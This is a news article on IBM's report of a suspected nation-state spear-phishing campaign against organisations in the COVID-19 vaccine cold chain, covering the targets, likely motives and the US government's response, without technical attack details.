Hackers “assumed to be state agents” have been waging a phishing campaign against pharmaceutical firms and other institutions involved in the forthcoming distribution of a vaccine against the novel coronavirus, IBM announced on Thursday.
In a post on Security Intelligence releasing their findings, IBM Security X-Force researchers wrote that “precision targeting of executives and key global organizations hold the potential hallmarks of a nation-state tradecraft,” adding the unknown hackers likely sought to obtain “advanced insight into the purchase and movement of a vaccine that can impact life and the global economy.” The target, according to IBM, appears to be the “cold chain”—a term for the logistics network that allows vaccines and other drugs to be carried from point of manufacture to distribution in temperature-controlled shipping containers. What the attackers hoped to accomplish is unknown, with possible motives ranging from theft of technology to intel that could be used to undermine trust in the vaccine or disrupt distribution.
IBM researchers wrote that the individuals targeted firms in at least six countries and used tactics such as impersonating a Haier Biomedical executive to send spear-phishing emails and targeting the help and support pages of organizations. Many of the targets were linked to international vaccine alliance Gavi’s cold chain program and included European Union bodies key to vaccine distribution, UNICEF, companies that manufacture solar panels used in cold storage, and IT firms that protect pharmaceutical firms:
The targets included the European Commission’s Directorate-General for Taxation and Customs Union, as well as organizations within the energy, manufacturing, website creation and software and internet security solutions sectors. These are global organizations headquartered in Germany, Italy, South Korea, Czech Republic, greater Europe and Taiwan.
The spear-phishing emails sent included malicious HTML files that prompted recipients to enter their login credentials, which would pass them on to the attackers. Pfizer and Moderna, the two pharma firms manufacturing vaccines expected to begin rollout shortly in the U.S., did not appear to be targeted, according to the New York Times. Nor are any other U.S. firms known to be targeted.
The most likely explanation is a nation-state because there is no clear “cash out” for cyber-criminals, the IBM researchers added in the release, other than the possibility that knowledge of vaccine shipping routes and safe storage requirements could be sold as a “hot black-market commodity.” It’s also possible hackers could be interested in using stolen credentials to launch ransomware attacks on computer-controlled shipping containers. According to the Washington Post, it’s not clear whether the hackers were successful at any of their phishing attempts.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” IBM Security X-Force senior cyber threat analyst Claire Zaboeva told Wired. “... The door is really open. Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
Per the Times, federal officials said the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) will respond to IBM’s alert by notifying agencies involved in Operation Warp Speed, the U.S. effort to develop and distribute a vaccine. CISA coronavirus strategist Josh Corman told the Times there is a need for stepped-up “cybersecurity diligence at each step in the vaccine supply chain” and for institutions “involved in vaccine storage and transport to harden attack surfaces, particularly in cold storage operation.”